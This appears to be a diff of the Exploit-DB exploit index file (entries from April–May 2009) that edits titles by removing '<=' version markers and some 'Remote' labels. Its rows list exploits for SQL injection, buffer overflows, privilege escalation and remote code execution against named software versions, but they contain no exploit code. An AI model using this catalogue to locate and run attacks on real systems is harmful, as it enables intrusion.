8390,platforms/windows/dos/8390.cpp,"Xilisoft Video Converter Wizard 3 - (.cue) Stack Buffer Overflow PoC",2009-04-10,"fl0 fl0w",windows,dos,0 8391,platforms/windows/dos/8391.txt,"Chance-i DiViS-Web DVR System ActiveX Control Heap Overflow PoC",2009-04-10,DSecRG,windows,dos,0 @@ -7906,13 +7906,13 @@ id,file,description,date,author,platform,type,port 8396,platforms/php/webapps/8396.pl,"w3bcms Gaestebuch 3.0.0 - Blind SQL Injection Exploit",2009-04-10,DNX,php,webapps,0 8397,platforms/asp/webapps/8397.txt,"FunkyASP AD System 1.1 - Remote Shell Upload",2009-04-10,ZoRLu,asp,webapps,0 8398,platforms/windows/remote/8398.php,"ftpdmin 0.96 RNFR Remote Buffer Overflow Exploit (xp sp3/case study)",2009-04-13,surfista,windows,remote,21 -8399,platforms/php/webapps/8399.pl,"Flatnuke <= 2.7.1 - (level) Remote Privilege Escalation Exploit",2009-04-13,StAkeR,php,webapps,0 -8401,platforms/windows/local/8401.cpp,"HTML Email Creator <= 2.1b668 - (html) Local SEH Overwrite Exploit",2009-04-13,dun,windows,local,0 +8399,platforms/php/webapps/8399.pl,"Flatnuke 2.7.1 - (level) Remote Privilege Escalation Exploit",2009-04-13,StAkeR,php,webapps,0 +8401,platforms/windows/local/8401.cpp,"HTML Email Creator 2.1b668 - (html) Local SEH Overwrite Exploit",2009-04-13,dun,windows,local,0 8402,platforms/windows/dos/8402.pl,"Mini-stream Ripper - (.M3U) Local Stack Overflow PoC",2009-04-13,Cyber-Zone,windows,dos,0 8403,platforms/windows/dos/8403.pl,"WM Downloader - (.M3U) Local Stack Overflow PoC",2009-04-13,Cyber-Zone,windows,dos,0 8404,platforms/windows/dos/8404.pl,"RM Downloader - (.M3U) Local Stack Overflow PoC",2009-04-13,Cyber-Zone,windows,dos,0 8405,platforms/windows/dos/8405.pl,"Mini-stream RM-MP3 Converter - (.M3U) Local Stack Overflow PoC",2009-04-13,Cyber-Zone,windows,dos,0 -8406,platforms/openbsd/dos/8406.txt,"OpenBSD <= 4.5 - (IP datagrams) Remote DoS",2009-04-13,Rembrandt,openbsd,dos,0 +8406,platforms/openbsd/dos/8406.txt,"OpenBSD 4.5 - (IP datagrams) Remote DoS",2009-04-13,Rembrandt,openbsd,dos,0 8407,platforms/windows/dos/8407.pl,"ASX to MP3 Converter - (.M3U) Local Stack Overflow PoC",2009-04-13,Cyber-Zone,windows,dos,0 8408,platforms/php/webapps/8408.txt,"X10Media Mp3 - Search Engine < 1.6.2 Admin Access",2009-04-13,THUNDER,php,webapps,0 8409,platforms/php/webapps/8409.txt,"Yellow Duck Weblog 2.1.0 - (lang) Local File Inclusion",2009-04-13,ahmadbady,php,webapps,0 @@ -7921,7 +7921,7 @@ id,file,description,date,author,platform,type,port 8412,platforms/windows/local/8412.pl,"ASX to MP3 Converter 3.0.0.7 - (.m3u) Universal Stack Overflow Exploit",2009-04-13,Stack,windows,local,0 8413,platforms/windows/local/8413.pl,"Mini-stream RM-MP3 Converter 3.0.0.7 - (.m3u) Stack Overflow Exploit",2009-04-13,Stack,windows,local,0 8414,platforms/php/webapps/8414.txt,"XEngineSoft PMS/MGS/NM/Ams 1.0 - (Auth Bypass) SQL Injection Vulnerabilities",2009-04-13,Dr-HTmL,php,webapps,0 -8415,platforms/php/webapps/8415.txt,"FreznoShop 1.3.0 - (id) Remote SQL Injection",2009-04-13,NoGe,php,webapps,0 +8415,platforms/php/webapps/8415.txt,"FreznoShop 1.3.0 - (id) SQL Injection",2009-04-13,NoGe,php,webapps,0 8416,platforms/windows/local/8416.pl,"Mini-stream Ripper 3.0.1.1 - (.m3u) Universal Stack Overflow Exploit",2009-04-13,Stack,windows,local,0 8417,platforms/php/webapps/8417.txt,"e107 Plugin userjournals_menu (blog.id) SQL Injection",2009-04-13,boom3rang,php,webapps,0 8418,platforms/php/webapps/8418.pl,"ASP Product Catalog 1.0 - (XSS/DD) Multiple Remote Exploits",2009-04-13,AlpHaNiX,php,webapps,0 @@ -7936,7 +7936,7 @@ id,file,description,date,author,platform,type,port 8427,platforms/windows/local/8427.py,"Easy RM to MP3 Converter - Universal Stack Overflow Exploit",2009-04-14,Stack,windows,local,0 8428,platforms/windows/remote/8428.txt,"MonGoose 2.4 (Windows) - Webserver Directory Traversal",2009-04-14,e.wiZz!,windows,remote,0 8429,platforms/multiple/dos/8429.pl,"Steamcast 0.9.75b Remote Denial of Service Exploit",2009-04-14,ksa04,multiple,dos,0 -8430,platforms/openbsd/dos/8430.py,"OpenBSD <= 4.5 IP datagram Null Pointer Deref DoS Exploit",2009-04-14,nonroot,openbsd,dos,0 +8430,platforms/openbsd/dos/8430.py,"OpenBSD 4.5 IP datagram Null Pointer Deref DoS Exploit",2009-04-14,nonroot,openbsd,dos,0 8431,platforms/php/webapps/8431.txt,"GuestCal 2.1 - (index.php lang) Local File Inclusion",2009-04-14,SirGod,php,webapps,0 8432,platforms/php/webapps/8432.txt,"Aqua CMS (username) SQL Injection",2009-04-14,halkfild,php,webapps,0 8433,platforms/php/webapps/8433.txt,"RQms (Rash) <= 1.2.2 - Multiple SQL Injection Vulnerabilities",2009-04-14,Dimi4,php,webapps,0 @@ -7950,11 +7950,11 @@ id,file,description,date,author,platform,type,port 8441,platforms/php/webapps/8441.txt,"phpDatingClub - (conf.inc) File Disclosure",2009-04-15,InjEctOr5,php,webapps,0 8442,platforms/php/webapps/8442.txt,"Job2C (conf.inc) Config File Disclosure",2009-04-15,InjEctOr5,php,webapps,0 8443,platforms/php/webapps/8443.txt,"Job2C 4.2 - (adtype) Local File Inclusion",2009-04-15,ZoRLu,php,webapps,0 -8444,platforms/windows/local/8444.cpp,"Star Downloader Free <= 1.45 - (.dat) Universal SEH Overwrite Exploit",2009-04-15,dun,windows,local,0 +8444,platforms/windows/local/8444.cpp,"Star Downloader Free 1.45 - (.dat) Universal SEH Overwrite Exploit",2009-04-15,dun,windows,local,0 8445,platforms/windows/dos/8445.pl,"Microsoft Windows Media Player - (.mid) Integer Overflow PoC",2009-04-15,HuoFu,windows,dos,0 8446,platforms/php/webapps/8446.txt,"FreeWebshop.org 2.2.9 RC2 - (lang_file) Local File Inclusion",2009-04-15,ahmadbady,php,webapps,0 8447,platforms/windows/dos/8447.txt,"Zervit Web Server 0.02 - Remote Buffer Overflow PoC",2009-04-15,e.wiZz!,windows,dos,0 -8448,platforms/php/webapps/8448.php,"Geeklog <= 1.5.2 - savepreferences()/*blocks[] SQL Injection Exploit",2009-04-16,Nine:Situations:Group,php,webapps,0 +8448,platforms/php/webapps/8448.php,"Geeklog 1.5.2 - savepreferences()/*blocks[] SQL Injection Exploit",2009-04-16,Nine:Situations:Group,php,webapps,0 8449,platforms/php/webapps/8449.txt,"NetHoteles 2.0/3.0 - (Auth Bypass) SQL Injection",2009-04-16,Dns-Team,php,webapps,0 8450,platforms/php/webapps/8450.txt,"Online Password Manager 4.1 Insecure Cookie Handling",2009-04-16,ZoRLu,php,webapps,0 8451,platforms/windows/dos/8451.pl,"Apollo 37zz - (.m3u) Local Heap Overflow PoC",2009-04-16,Cyber-Zone,windows,dos,0 @@ -7964,7 +7964,7 @@ id,file,description,date,author,platform,type,port 8455,platforms/php/webapps/8455.txt,"cpCommerce 1.2.8 - (id_document) Blind SQL Injection",2009-04-16,NoGe,php,webapps,0 8456,platforms/multiple/local/8456.txt,"Oracle APEX 3.2 - Unprivileged DB users can see APEX password hashes",2009-04-16,"Alexander Kornbrust",multiple,local,0 8457,platforms/php/webapps/8457.txt,"NetHoteles 3.0 - (ficha.php) SQL Injection",2009-04-16,snakespc,php,webapps,0 -8458,platforms/multiple/remote/8458.txt,"Apache Geronimo <= 2.1.3 - Multiple Directory Traversal Vulnerabilities",2009-04-16,DSecRG,multiple,remote,0 +8458,platforms/multiple/remote/8458.txt,"Apache Geronimo 2.1.3 - Multiple Directory Traversal Vulnerabilities",2009-04-16,DSecRG,multiple,remote,0 8459,platforms/php/webapps/8459.htm,"eLitius 1.0 - (manage-admin.php) Add Admin/Change Password Exploit",2009-04-16,"ThE g0bL!N",php,webapps,0 8460,platforms/php/webapps/8460.txt,"SMA-DB 0.3.13 - Multiple Remote File Inclusion Vulnerabilities",2009-04-16,JosS,php,webapps,0 8461,platforms/php/webapps/8461.txt,"chCounter 3.1.3 - (Login Bypass) SQL Injection",2009-04-16,tmh,php,webapps,0 @@ -7975,11 +7975,11 @@ id,file,description,date,author,platform,type,port 8466,platforms/windows/dos/8466.pl,"Microsoft GDI Plugin .png Infinite Loop Denial of Service PoC",2009-04-17,"Code Audit Labs",windows,dos,0 8467,platforms/windows/dos/8467.pl,"Microsoft Media Player - (quartz.dll .wav) Multiple Remote DoS Vulnerabilities",2009-04-17,"Code Audit Labs",windows,dos,0 8468,platforms/php/webapps/8468.txt,"Limbo CMS 1.0.4.2 - CSRF Privilege Escalation PoC",2009-04-17,"Alfons Luja",php,webapps,0 -8469,platforms/linux/dos/8469.c,"XRDP <= 0.4.1 - Remote Buffer Overflow PoC (pre-auth)",2009-04-17,"joe walko",linux,dos,0 +8469,platforms/linux/dos/8469.c,"XRDP 0.4.1 - Remote Buffer Overflow PoC (pre-auth)",2009-04-17,"joe walko",linux,dos,0 8470,platforms/linux/local/8470.py,"cTorrent/DTorrent - (.Torrent) Buffer Overflow Exploit",2009-04-17,"Michael Brooks",linux,local,0 8471,platforms/php/webapps/8471.txt,"ClanTiger < 1.1.1 - Multiple Cookie Handling Vulnerabilities",2009-04-17,YEnH4ckEr,php,webapps,0 -8472,platforms/php/webapps/8472.txt,"ClanTiger <= 1.1.1 - (Auth Bypass) SQL Injection",2009-04-17,YEnH4ckEr,php,webapps,0 -8473,platforms/php/webapps/8473.pl,"ClanTiger <= 1.1.1 - (slug) Blind SQL Injection Exploit",2009-04-17,YEnH4ckEr,php,webapps,0 +8472,platforms/php/webapps/8472.txt,"ClanTiger 1.1.1 - (Auth Bypass) SQL Injection",2009-04-17,YEnH4ckEr,php,webapps,0 +8473,platforms/php/webapps/8473.pl,"ClanTiger 1.1.1 - (slug) Blind SQL Injection Exploit",2009-04-17,YEnH4ckEr,php,webapps,0 8474,platforms/php/webapps/8474.txt,"e-cart.biz Shopping Cart Arbitrary File Upload",2009-04-17,ahmadbady,php,webapps,0 8475,platforms/php/webapps/8475.txt,"Online Guestbook Pro (display) Blind SQL Injection",2009-04-17,"Hussin X",php,webapps,0 8476,platforms/php/webapps/8476.txt,"Online Email Manager Insecure Cookie Handling",2009-04-17,"Hussin X",php,webapps,0 @@ -7988,7 +7988,7 @@ id,file,description,date,author,platform,type,port 8479,platforms/windows/dos/8479.html,"Microsoft Internet Explorer EMBED Memory Corruption PoC (MS09-014)",2009-04-20,Skylined,windows,dos,0 8480,platforms/php/webapps/8480.txt,"multi-lingual e-commerce system 0.2 - Multiple Vulnerabilities",2009-04-20,"Salvatore Fresta",php,webapps,0 8481,platforms/php/webapps/8481.txt,"Studio Lounge Address Book 2.5 - (profile) Shell Upload",2009-04-20,JosS,php,webapps,0 -8482,platforms/php/webapps/8482.txt,"Seditio CMS Events Plugin (c) Remote SQL Injection",2009-04-20,OoN_Boy,php,webapps,0 +8482,platforms/php/webapps/8482.txt,"Seditio CMS Events Plugin (c) SQL Injection",2009-04-20,OoN_Boy,php,webapps,0 8483,platforms/php/webapps/8483.txt,"flatnux 2009-03-27 - (upload/id) Multiple Vulnerabilities",2009-04-20,girex,php,webapps,0 8484,platforms/windows/dos/8484.pl,"1by1 1.67 - (.m3u) Local Stack Overflow PoC",2009-04-20,GoLd_M,windows,dos,0 8485,platforms/windows/dos/8485.pl,"Groovy Media Player 1.1.0 - (.m3u) Local Stack Overflow PoC",2009-04-20,GoLd_M,windows,dos,0 @@ -8005,21 +8005,21 @@ id,file,description,date,author,platform,type,port 8496,platforms/php/webapps/8496.htm,"TotalCalendar 2.4 - Remote Password Change Exploit",2009-04-20,"ThE g0bL!N",php,webapps,0 8497,platforms/php/webapps/8497.txt,"Creasito e-Commerce 1.3.16 - (Auth Bypass) SQL Injection",2009-04-20,"Salvatore Fresta",php,webapps,0 8498,platforms/php/webapps/8498.txt,"eLitius 1.0 - Arbitrary Database Backup Exploit",2009-04-20,"ThE g0bL!N",php,webapps,0 -8499,platforms/php/webapps/8499.php,"Dokeos Lms <= 1.8.5 - (whoisonline.php) PHP Code Injection Exploit",2009-04-21,EgiX,php,webapps,0 +8499,platforms/php/webapps/8499.php,"Dokeos Lms 1.8.5 - (whoisonline.php) PHP Code Injection Exploit",2009-04-21,EgiX,php,webapps,0 8500,platforms/windows/dos/8500.py,"Zervit Web Server 0.3 - Remote Denial of Service Exploit",2009-04-21,shinnai,windows,dos,0 8501,platforms/php/webapps/8501.txt,"CRE Loaded 6.2 - (products_id) SQL Injection",2009-04-21,Player,php,webapps,0 8502,platforms/php/webapps/8502.txt,"pastelcms 0.8.0 - (LFI/SQL) Multiple Vulnerabilities",2009-04-21,SirGod,php,webapps,0 8503,platforms/php/webapps/8503.txt,"TotalCalendar 2.4 - (include) Local File Inclusion",2009-04-21,SirGod,php,webapps,0 8504,platforms/php/webapps/8504.txt,"NotFTP 1.3.1 - (newlang) Local File Inclusion",2009-04-21,Kacper,php,webapps,0 -8505,platforms/php/webapps/8505.txt,"Quick.Cms.Lite 0.5 - (id) Remote SQL Injection",2009-04-21,Player,php,webapps,0 -8506,platforms/php/webapps/8506.txt,"VS PANEL 7.3.6 - (Cat_ID) Remote SQL Injection",2009-04-21,Player,php,webapps,0 +8505,platforms/php/webapps/8505.txt,"Quick.Cms.Lite 0.5 - (id) SQL Injection",2009-04-21,Player,php,webapps,0 +8506,platforms/php/webapps/8506.txt,"VS PANEL 7.3.6 - (Cat_ID) SQL Injection",2009-04-21,Player,php,webapps,0 8507,platforms/windows/dos/8507.py,"Oracle RDBms 10.2.0.3/11.1.0.6 - TNS Listener PoC",2009-04-21,"Dennis Yurichev",windows,dos,0 8508,platforms/php/webapps/8508.txt,"I-Rater Pro/Plantinum 4.0 - (Auth Bypass) SQL Injection",2009-04-21,Hakxer,php,webapps,0 8509,platforms/php/webapps/8509.txt,"Studio Lounge Address Book 2.5 - Authentication Bypass",2009-04-21,"ThE g0bL!N",php,webapps,0 8510,platforms/php/webapps/8510.txt,"mixedcms 1.0b - (LFI/su/ab/fd) Multiple Vulnerabilities",2009-04-21,YEnH4ckEr,php,webapps,0 -8511,platforms/windows/dos/8511.pl,"Xitami Web Server <= 5.0 - Remote Denial of Service Exploit",2009-04-22,"Jonathan Salwan",windows,dos,0 +8511,platforms/windows/dos/8511.pl,"Xitami Web Server 5.0 - Remote Denial of Service Exploit",2009-04-22,"Jonathan Salwan",windows,dos,0 8512,platforms/windows/dos/8512.txt,"Counter Strike Source ManiAdminPlugin 2.0 - Remote Crash Exploit",2009-04-22,M4rt1n,windows,dos,0 -8513,platforms/php/webapps/8513.pl,"Dokeos Lms <= 1.8.5 - (include) Remote Code Execution Exploit",2009-04-22,StAkeR,php,webapps,0 +8513,platforms/php/webapps/8513.pl,"Dokeos Lms 1.8.5 - (include) Remote Code Execution Exploit",2009-04-22,StAkeR,php,webapps,0 8514,platforms/php/webapps/8514.txt,"elkagroup Image Gallery 1.0 - Arbitrary File Upload",2009-04-22,Securitylab.ir,php,webapps,0 8515,platforms/php/webapps/8515.txt,"5 star Rating 1.2 - (Auth Bypass) SQL Injection",2009-04-22,zer0day,php,webapps,0 8516,platforms/php/webapps/8516.txt,"WebPortal CMS 0.8b - Multiple Remote/Local File Inclusion Vulnerabilities",2009-04-22,ahmadbady,php,webapps,0 @@ -8028,9 +8028,9 @@ id,file,description,date,author,platform,type,port 8519,platforms/windows/local/8519.pl,"CoolPlayer Portable 2.19.1 - (m3u) Buffer Overflow Exploit (1)",2009-04-22,Stack,windows,local,0 8520,platforms/windows/local/8520.py,"CoolPlayer Portable 2.19.1 - (m3u) Buffer Overflow Exploit (2)",2009-04-22,His0k4,windows,local,0 8521,platforms/php/webapps/8521.txt,"fowlcms 1.1 - (ab/LFI/su) Multiple Vulnerabilities",2009-04-23,YEnH4ckEr,php,webapps,0 -8522,platforms/windows/dos/8522.pl,"Zervit Web Server <= 0.3 - (sockets++ crash) Remote Denial of Service",2009-04-22,"Jonathan Salwan",windows,dos,0 +8522,platforms/windows/dos/8522.pl,"Zervit Web Server 0.3 - (sockets++ crash) Remote Denial of Service",2009-04-22,"Jonathan Salwan",windows,dos,0 8523,platforms/windows/dos/8523.txt,"Norton Ghost Support module for EasySetup wizard Remote DoS PoC",2009-04-23,shinnai,windows,dos,0 -8524,platforms/windows/dos/8524.txt,"Home Web Server <= r1.7.1 - (build 147) Gui Thread-Memory Corruption",2009-04-23,Aodrulez,windows,dos,0 +8524,platforms/windows/dos/8524.txt,"Home Web Server r1.7.1 - (build 147) Gui Thread-Memory Corruption",2009-04-23,Aodrulez,windows,dos,0 8525,platforms/windows/remote/8525.pl,"Dream FTP Server 1.02 - (users.dat) Arbitrary File Disclosure Exploit",2009-04-23,Cyber-Zone,windows,remote,0 8526,platforms/windows/dos/8526.py,"Popcorn 1.87 - Remote Heap Overflow Exploit PoC",2009-04-23,x.CJP.x,windows,dos,0 8527,platforms/windows/local/8527.py,"CoolPlayer Portable 2.19.1 - (Skin) Buffer Overflow Exploit",2009-04-23,Stack,windows,local,0 @@ -8039,7 +8039,7 @@ id,file,description,date,author,platform,type,port 8531,platforms/windows/dos/8531.pl,"SDP Downloader 2.3.0 - (.ASX) Local Heap Overflow PoC",2009-04-24,Cyber-Zone,windows,dos,0 8532,platforms/php/webapps/8532.txt,"photo-rigma.biz 30 - (SQL/XSS) Multiple Vulnerabilities",2009-04-24,YEnH4ckEr,php,webapps,0 8533,platforms/php/webapps/8533.txt,"Pragyan CMS 2.6.4 - Multiple SQL Injection Vulnerabilities",2009-04-24,"Salvatore Fresta",php,webapps,0 -8534,platforms/linux/local/8534.c,"libvirt_proxy <= 0.5.1 - Local Privilege Escalation Exploit",2009-04-27,"Jon Oberheide",linux,local,0 +8534,platforms/linux/local/8534.c,"libvirt_proxy 0.5.1 - Local Privilege Escalation Exploit",2009-04-27,"Jon Oberheide",linux,local,0 8535,platforms/windows/local/8535.pl,"Destiny Media Player 1.61 - (.rdl) Local Buffer Overflow Exploit",2009-04-27,G4N0K,windows,local,0 8536,platforms/windows/local/8536.py,"SDP Downloader 2.3.0 - (.ASX) Local Buffer Overflow Exploit (SEH)",2009-04-27,His0k4,windows,local,0 8537,platforms/windows/remote/8537.txt,"dwebpro 6.8.26 - (dt/fd) Multiple Vulnerabilities",2009-04-27,"Alfons Luja",windows,remote,0 @@ -8048,12 +8048,12 @@ id,file,description,date,author,platform,type,port 8540,platforms/windows/local/8540.c,"SDP Downloader 2.3.0 - (.ASX) Local Buffer Overflow Exploit (SEH) (2)",2009-04-27,SimO-s0fT,windows,local,0 8541,platforms/windows/local/8541.php,"Zoom Player Pro 3.30 - (.m3u) File Buffer Overflow Exploit (seh)",2009-04-27,Nine:Situations:Group,windows,local,0 8542,platforms/windows/dos/8542.php,"Icewarp Merak Mail Server 9.4.1 Base64FileEncode() BoF PoC",2009-04-27,Nine:Situations:Group,windows,dos,0 -8543,platforms/php/webapps/8543.php,"LightBlog <= 9.9.2 - (register.php) Remote Code Execution Exploit",2009-04-27,EgiX,php,webapps,0 -8544,platforms/linux/dos/8544.pl,"iodined <= 0.4.2-2 - (forged DNS packet) Denial of Service Exploit",2009-04-27,"Albert Sellares",linux,dos,0 +8543,platforms/php/webapps/8543.php,"LightBlog 9.9.2 - (register.php) Remote Code Execution Exploit",2009-04-27,EgiX,php,webapps,0 +8544,platforms/linux/dos/8544.pl,"iodined 0.4.2-2 - (forged DNS packet) Denial of Service Exploit",2009-04-27,"Albert Sellares",linux,dos,0 8545,platforms/php/webapps/8545.txt,"dew-newphplinks 2.0 - (LFI/XSS) Multiple Vulnerabilities",2009-04-27,d3v1l,php,webapps,0 8546,platforms/php/webapps/8546.txt,"Thickbox Gallery 2 - (index.php ln) Local File Inclusion",2009-04-27,SirGod,php,webapps,0 -8547,platforms/php/webapps/8547.txt,"EZ-Blog Beta2 - (category) Remote SQL Injection",2009-04-27,YEnH4ckEr,php,webapps,0 -8548,platforms/php/webapps/8548.txt,"ECShop 2.5.0 - (order_sn) Remote SQL Injection",2009-04-27,Securitylab.ir,php,webapps,0 +8547,platforms/php/webapps/8547.txt,"EZ-Blog Beta2 - (category) SQL Injection",2009-04-27,YEnH4ckEr,php,webapps,0 +8548,platforms/php/webapps/8548.txt,"ECShop 2.5.0 - (order_sn) SQL Injection",2009-04-27,Securitylab.ir,php,webapps,0 8549,platforms/php/webapps/8549.txt,"Flatchat 3.0 - (pmscript.php with) Local File Inclusion",2009-04-27,SirGod,php,webapps,0 8550,platforms/php/webapps/8550.txt,"Teraway LinkTracker 1.0 Insecure Cookie Handling",2009-04-27,"ThE g0bL!N",php,webapps,0 8551,platforms/php/webapps/8551.txt,"Teraway FileStream 1.0 Insecure Cookie Handling",2009-04-27,"ThE g0bL!N",php,webapps,0 @@ -8061,22 +8061,22 @@ id,file,description,date,author,platform,type,port 8553,platforms/php/webapps/8553.htm,"Teraway LinkTracker 1.0 - Remote Password Change Exploit",2009-04-27,"ThE g0bL!N",php,webapps,0 8554,platforms/windows/remote/8554.py,"Belkin Bulldog Plus HTTP Server Remote Buffer Overflow Exploit",2009-04-27,His0k4,windows,remote,80 8555,platforms/php/webapps/8555.txt,"ABC Advertise 1.0 Admin Password Disclosure",2009-04-27,SirGod,php,webapps,0 -8556,platforms/linux/remote/8556.c,"Linux Kernel <= 2.6.20 / <= 2.6.24 / <= 2.6.27_7-10 (Ubuntu 7.04/8.04/8.10 / Fedora Core 10 / OpenSuse 11.1) - SCTP FWD Memory Corruption Remote Exploit",2009-04-28,sgrakkyu,linux,remote,0 +8556,platforms/linux/remote/8556.c,"Linux Kernel 2.6.20 / <= 2.6.24 / <= 2.6.27_7-10 (Ubuntu 7.04/8.04/8.10 / Fedora Core 10 / OpenSuse 11.1) - SCTP FWD Memory Corruption Remote Exploit",2009-04-28,sgrakkyu,linux,remote,0 8557,platforms/php/webapps/8557.htm,"VisionLms 1.0 - (changePW.php) Remote Password Change Exploit",2009-04-28,Mr.tro0oqy,php,webapps,0 8558,platforms/php/webapps/8558.txt,"MIM: InfiniX 1.2.003 - Multiple SQL Injection Vulnerabilities",2009-04-28,YEnH4ckEr,php,webapps,0 -8559,platforms/php/webapps/8559.c,"webSPELL <= 4.2.0d - Local File Disclosure Exploit (.c Linux)",2009-04-28,StAkeR,php,webapps,0 +8559,platforms/php/webapps/8559.c,"webSPELL 4.2.0d - Local File Disclosure Exploit (.c Linux)",2009-04-28,StAkeR,php,webapps,0 8560,platforms/windows/remote/8560.html,"Autodesk IDrop ActiveX Remote Code Execution Exploit",2009-04-28,Elazar,windows,remote,0 8561,platforms/windows/remote/8561.pl,"Quick 'n Easy Web Server 3.3.5 - Arbitrary File Disclosure Exploit",2009-04-28,Cyber-Zone,windows,remote,0 8562,platforms/windows/remote/8562.html,"Symantec Fax Viewer Control 10 - (DCCFAXVW.DLL) Remote BoF Exploit",2009-04-29,Nine:Situations:Group,windows,remote,0 8563,platforms/php/webapps/8563.txt,"eLitius 1.0 - (banner-details.php id) SQL Injection",2009-04-29,snakespc,php,webapps,0 8564,platforms/windows/remote/8564.pl,"Baby Web Server 2.7.2.0 - Arbitrary File Disclosure Exploit",2009-04-29,ZoRLu,windows,remote,0 -8565,platforms/php/webapps/8565.txt,"ProjectCMS 1.0b (index.php sn) Remote SQL Injection",2009-04-29,YEnH4ckEr,php,webapps,0 +8565,platforms/php/webapps/8565.txt,"ProjectCMS 1.0b (index.php sn) SQL Injection",2009-04-29,YEnH4ckEr,php,webapps,0 8566,platforms/php/webapps/8566.txt,"S-CMS 1.1 Stable (page) Local File Inclusion",2009-04-29,ZoRLu,php,webapps,0 8567,platforms/php/webapps/8567.txt,"Zubrag Smart File Download 1.3 - Arbitrary File Download",2009-04-29,Aodrulez,php,webapps,0 8568,platforms/windows/dos/8568.pl,"mpegable Player 2.12 - (.YUV) Local Stack Overflow PoC",2009-04-29,GoLd_M,windows,dos,0 8569,platforms/linux/remote/8569.txt,"Adobe Reader 8.1.4/9.1 GetAnnots() Remote Code Execution Exploit",2009-04-29,Arr1val,linux,remote,0 8570,platforms/linux/remote/8570.txt,"Adobe 8.1.4/9.1 customDictionaryOpen() Code Execution Exploit",2009-04-29,Arr1val,linux,remote,0 -8571,platforms/php/webapps/8571.txt,"Tiger Dms (Auth Bypass) Remote SQL Injection",2009-04-29,"ThE g0bL!N",php,webapps,0 +8571,platforms/php/webapps/8571.txt,"Tiger Dms (Auth Bypass) SQL Injection",2009-04-29,"ThE g0bL!N",php,webapps,0 8572,platforms/linux/local/8572.c,"Linux Kernel 2.6 (Gentoo / Ubuntu 8.10/9.04) - UDEV < 141 Local Privilege Escalation Exploit (2)",2009-04-30,"Jon Oberheide",linux,local,0 8573,platforms/windows/dos/8573.html,"Google Chrome 1.0.154.53 - (Null Pointer) Remote Crash Exploit",2009-04-30,"Aditya K Sood",windows,dos,0 8576,platforms/php/webapps/8576.pl,"Leap CMS 0.1.4 - (searchterm) Blind SQL Injection Exploit",2009-04-30,YEnH4ckEr,php,webapps,0 @@ -8088,7 +8088,7 @@ id,file,description,date,author,platform,type,port 8582,platforms/windows/local/8582.py,"Mercury Audio Player 1.21 - (.pls) SEH Overwrite Exploit",2009-04-30,His0k4,windows,local,0 8583,platforms/windows/local/8583.py,"Mercury Audio Player 1.21 - (.m3u) Local Stack Overflow Exploit",2009-05-01,His0k4,windows,local,0 8584,platforms/hardware/dos/8584.py,"Addonics NAS Adapter FTP Remote Denial of Service Exploit",2009-05-01,h00die,hardware,dos,0 -8585,platforms/php/webapps/8585.txt,"Golabi CMS <= 1.0.1 Session Poisoning",2009-05-01,CrazyAngel,php,webapps,0 +8585,platforms/php/webapps/8585.txt,"Golabi CMS 1.0.1 Session Poisoning",2009-05-01,CrazyAngel,php,webapps,0 8586,platforms/php/webapps/8586.txt,"MiniTwitter 0.2b - Multiple SQL Injection Vulnerabilities",2009-05-01,YEnH4ckEr,php,webapps,0 8587,platforms/php/webapps/8587.htm,"MiniTwitter 0.2b Remote User Options Changer Exploit",2009-05-01,YEnH4ckEr,php,webapps,0 8588,platforms/windows/dos/8588.pl,"Beatport Player 1.0.0.283 - (.M3U) Local Buffer Overflow PoC",2009-05-01,SirGod,windows,dos,0 @@ -8103,7 +8103,7 @@ id,file,description,date,author,platform,type,port 8597,platforms/solaris/dos/8597.c,"Solaris 10 / OpenSolaris - (dtrace) Local Kernel Denial of Service PoC",2009-05-04,mu-b,solaris,dos,0 8598,platforms/solaris/dos/8598.c,"Solaris 10 / OpenSolaris - (fasttrap) Local Kernel Denial of Service PoC",2009-05-04,mu-b,solaris,dos,0 8599,platforms/php/webapps/8599.txt,"AGTC MyShop 3.2 Insecure Cookie Handling",2009-05-04,Mr.tro0oqy,php,webapps,0 -8600,platforms/php/webapps/8600.txt,"BluSky CMS (news_id) Remote SQL Injection",2009-05-04,snakespc,php,webapps,0 +8600,platforms/php/webapps/8600.txt,"BluSky CMS (news_id) SQL Injection",2009-05-04,snakespc,php,webapps,0 8601,platforms/windows/dos/8601.txt,"EW-MusicPlayer 0.8 - (.m3u) Local Buffer Overflow PoC",2009-05-04,SirGod,windows,dos,0 8602,platforms/php/webapps/8602.txt,"Qt quickteam Multiple Remote File Inclusion Vulnerabilities",2009-05-04,ahmadbady,php,webapps,0 8603,platforms/php/webapps/8603.php,"eLitius 1.0 - Remote Command Execution Exploit",2009-05-04,G4N0K,php,webapps,0 @@ -8115,7 +8115,7 @@ id,file,description,date,author,platform,type,port 8609,platforms/php/webapps/8609.pl,"Uguestbook 1.0b (guestbook.mdb) Arbitrary Database Disclosure Exploit",2009-05-04,Cyber-Zone,php,webapps,0 8610,platforms/asp/webapps/8610.pl,"Ublog access version - Arbitrary Database Disclosure Exploit",2009-05-04,Cyber-Zone,asp,webapps,0 8611,platforms/windows/dos/8611.pl,"32bit FTP (09.04.24) - Banner Remote Buffer Overflow PoC",2009-05-05,"Load 99%",windows,dos,0 -8612,platforms/windows/local/8612.pl,"Grabit <= 1.7.2 Beta 3 - (.nzb) Local Buffer Overflow Exploit (SEH)",2009-05-05,"Gaurav Baruah",windows,local,0 +8612,platforms/windows/local/8612.pl,"Grabit 1.7.2 Beta 3 - (.nzb) Local Buffer Overflow Exploit (SEH)",2009-05-05,"Gaurav Baruah",windows,local,0 8613,platforms/windows/remote/8613.py,"32bit FTP (09.04.24) - (CWD response) Remote Buffer Overflow Exploit",2009-05-05,His0k4,windows,remote,0 8614,platforms/windows/remote/8614.py,"32bit FTP (09.04.24) - (Banner) Remote Buffer Overflow Exploit",2009-05-05,His0k4,windows,remote,0 8615,platforms/php/webapps/8615.txt,"tematres 1.0.3 - (auth bypass/SQL/XSS) Multiple Vulnerabilities",2009-05-05,YEnH4ckEr,php,webapps,0 @@ -8125,7 +8125,7 @@ id,file,description,date,author,platform,type,port 8619,platforms/php/webapps/8619.txt,"Joomla Almond Classifieds 5.6.2 - Blind SQL Injection",2009-05-05,InjEctOr5,php,webapps,0 8620,platforms/windows/local/8620.pl,"Sorinara Streaming Audio Player 0.9 - (.m3u) Local Stack Overflow Exploit",2009-05-05,Stack,windows,local,0 8621,platforms/windows/remote/8621.py,"32bit FTP (09.04.24) - (CWD Response) Universal Seh Overwrite Exploit",2009-05-05,His0k4,windows,remote,0 -8622,platforms/php/webapps/8622.pl,"webSPELL <= 4.2.0e (page) Remote Blind SQL Injection Exploit",2009-05-07,DNX,php,webapps,0 +8622,platforms/php/webapps/8622.pl,"webSPELL 